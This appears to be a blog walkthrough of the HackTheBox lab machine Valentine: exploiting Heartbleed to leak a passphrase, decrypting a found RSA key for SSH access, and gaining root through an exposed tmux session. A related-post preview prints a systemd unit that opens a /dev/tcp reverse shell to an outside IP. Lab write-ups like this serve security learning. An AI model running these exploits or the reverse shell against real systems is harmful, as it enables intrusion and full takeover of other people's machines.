Skip to main content

HackTheBox - Valentine - Retired - Update

HackTheBox - Valentine - Retired - Update



Recon


I've been using threader3000 lately to do my recon scans. It does a staged scan, the first stage is a super quick up/down scan on all TCP ports. Then suggests an nmap scan based on the results of the open ports of the first scan. It also saves all the nmap scans out to a XML file which i like to convert to HTML to make it easy to read.


xsltproc ./valentine.htb/valentine.htb.xml -o ./valentine.html




Looks like we have just three open ports here.


Port Service Version
22 OpenSSH 5.9p1
80 Apache 2.2.22
443 Apache 2.2.22



And nmap thinks its a Ubuntu box.



Here is what we see on port 80


That logo is familiar….. But we will get back to that.


What about port 443?



Same thing but https….


So about that logo….


Not a whole lot of bugs get their own logo, but heartbleed does.


https://heartbleed.com/


CVE-2014-0160


"The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users."



Interesting..


Ok let's try to brute force scan the server to find any other folders or files that might be available to us.




Here is some of the output



So we have 3 new things to check out.


/dev/

/encode

/decode



Let's start with /encode.


Ok we have an input box that they will use to encode for us.. It's important here, that is says encode and encrypt…  Let's just put an "a" in there and see what happens.



a   is encoded as YQ==


I don't know about you but anytime i see a = at the end of an encoded string…. I think base64


In base64 encoding if the input is not the perfect amount of bytes it add equal signs to the end for padding.


Let's use our kali box to see if we decode YQ== as base64 if we get back an a


echo "YQ==" | base64 -d
a


Yup, so this site just takes your input and base64 encodes it… what about /decode?


It does the opposite, it takes your base64 encoded data and makes it back to ascii for you.





Ok what about /dev


Two files notes.txt and hype_key


What is in notes.txt?


To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Do not use the decoder/encoder until any of this is done.
6) Find a better way to take notes.


Some notes from the dev on what to fix. Okay what about the hype_key...



Looks like a bunch of hex.


Let's try and see if we can convert this.



https://www.rapidtables.com/convert/number/hex-to-ascii.html



Looks like, as its name suggests it is a key… an RSA Private key..


I saved this output to my kali box as rsa.key




Exploit


Let's look around for a heartbleed exploit we can leverage.


I found this github


https://github.com/mpgn/heartbleed-PoC


I did a git clone to my kali


And ran the exploit against valentine.htb


python2 ./heartbleed.py valentine.htb


SO backup………








We never really talked about heartbleed and what it does, basically what you need to know here is that it's a memory leak… sites that are using vulnerable version of TLS can have some of the contents of their memory exposed.



So, after this runs the POC will save any output of memory to a file named out.txt


python2 ./heartbleed.py valentine.htb


Let's check out our out.txt file and see what we might have gotten out of memory.


Looks like someone is trying to use the decode.php to decode a base 64 string… 


Let's help them out with that. :)


echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype


heartbleedbelievethehype


I wonder if we can use that with the RSA key we found earlier to ssh to the box… The only issue really is we don't know what the username might be still…


Could be root,valentine,hype,heart,heartbleed or anything else.



I tried valentine first


You need to change the permission of the rsa.key to be less open or SSH will yell at us


chmod 700 ./rsa_key




Good news….. It looks like heartbleedbelievethehype is the passphrase for the key but unfortunately not a password for valentine.


Let's try other usernames





We finally hit pay dirt with hype ( the name of the key on the server) 





And we can get the user flag from hype's folder



Looking in the user's folder We can see that .bash_history is not empty as per usual on HackTheBox machines.


So let's 



hype@Valentine:~$ cat .bash_history

exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
whoami
exit


Ok it looks like there are some tmux commands here that the user need help remembering how to use the --help is telling I think. Let's try executing the next command after the user looked for help


tmux -S /.devs/dev_sess 


We get dropped in a tmux session as root.






And it's pretty easy to grab our root flag from here.






Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more